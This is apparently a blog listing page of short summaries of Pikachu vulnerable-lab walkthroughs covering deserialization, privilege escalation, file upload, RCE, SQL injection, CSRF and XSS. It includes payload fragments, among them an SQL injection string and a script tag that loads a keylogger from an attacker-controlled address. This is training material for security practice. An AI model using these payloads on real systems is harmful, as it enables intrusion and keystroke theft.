摘要: php反序列化 序列化serialize()就是把一个对象变成可以传输的字符串,比如下面是一个对象: 反序列化unserialize()就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。 输入代码 O:1:"S":1:{s:4:"test";s:29:"<script>alert('a 阅读全文
posted @ 2020-03-31 15:03 漩溺 阅读(430) 评论(0) 推荐(0) 编辑
摘要: 水平越权 A用户和B用户属于同一级别用户,但各自不能操作对方个人信息。A用户如果越权操作B用户个人信息的情况称为水行越权操作 对比发现url只有username不同,所以我们不用退出账号直接访问lucy看看,发现水平越权 垂直越权 A用户权限高于B用户,B用户越权操作A用户的权限的情况称为垂直越权, 阅读全文
posted @ 2020-03-31 14:58 漩溺 阅读(304) 评论(0) 推荐(0) 编辑
摘要: filedownload 我们随便下载了一个文件之后发现url出现的信息与上面有点像 所以我们直接修改参数,下载其他的文件 client check 先上传一张真照片然后用bp抓取,在把filename的参数改成你想上传的东西 MIME type 与上一个的处理方法一样 getimagesize 这 阅读全文
posted @ 2020-03-31 14:52 漩溺 阅读(317) 评论(0) 推荐(0) 编辑
摘要: RCE exec ping 输入ip地址 后面加上个ipconfig exec “eval” 这里面直接写命令不行,但是加上函数名称就可以了,输入phpinfo()就行 文件 文件local 所以运用切换目录的方法切换到其他的php文件 file (remote) 测试之前需要把这俩个参数改成On 阅读全文
posted @ 2020-03-31 14:47 漩溺 阅读(160) 评论(0) 推荐(0) 编辑
摘要: sql注入数字型post bp抓包后修改下提交的数据即可 字符型注入 输入 ' 1 = 1# 搜索型 既然提示输入用户名的一部分猜想,使用的是sql中的like来进行匹配,这样使用%闭合即可 xx型注入 输入单引号返回提示 所以闭合就是 '),接着遍历 insert/update注入 既然是插入语句 阅读全文
posted @ 2020-03-31 14:41 漩溺 阅读(173) 评论(0) 推荐(0) 编辑
摘要: csrf csrf漏洞概念 csrf攻击满足的条件 1,网站没有对个人信息修改的请求进行防csrf处理,导致请求容易被伪造 2,用户在登录后台的情况下,点击了攻击者发送的链接,如果用户没登陆或没点链接都不会成功 csrf与xss的区别 如何确认一个web系统存在csrf漏洞 模仿用户从登录到信息修改 阅读全文
posted @ 2020-03-31 14:29 漩溺 阅读(235) 评论(0) 推荐(0) 编辑
摘要: 获取键盘记录 同样, 攻击js脚本位于网站目录下的 pkxss/rkeypress/rk.js 这里是攻击者的地址 留言板输入恶意代码 <script src='http://192.168.21.10/pikachu-master/pkxss/rkeypress/rk.js'></script> 阅读全文
posted @ 2020-03-31 14:19 漩溺 阅读(191) 评论(0) 推荐(0) 编辑